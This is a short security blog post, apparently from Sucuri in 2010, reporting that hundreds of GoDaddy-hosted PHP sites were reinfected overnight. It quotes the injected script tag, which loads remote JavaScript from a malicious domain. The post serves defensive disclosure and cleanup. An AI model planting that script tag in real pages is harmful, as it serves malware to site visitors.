0 SHARES Facebook Twitter

Update2: Reply from GoDaddy: https://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html

Update: Code used to exploit found: https://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html

We just got reports this morning of hundreds of sites getting reinfected at GoDaddy (shared servers). This is the new javascript being added to the sites:

< script src =”http://holasionweb.com/oo.php”>< /script>

The changes were all made this morning between 2am and 3am, changing all PHP files with this new code.

All the sites we checked so far were updated (WordPress 2.9.2) and using good permissions. Plus. not all of them were using WordPress. I don’t want to see the “users were not updated” excuse again, please. GoDaddy, any ideas to what is going on?

Note that our previous solution will still clean it up: https://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

The details are all the same from the previous attack, just using a new host (and new victims):

https://blog.sucuri.net/2010/05/new-attack-today-against-wordpress.html

http://sucuri.net/malware/entry/MW:MROBH:1

Notice that this is not related to one specific platform. Most of the sites we checked were using WordPress, but some were on Joomla or using other web applications. Plus, very annoying since all the PHP files get modified.

As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.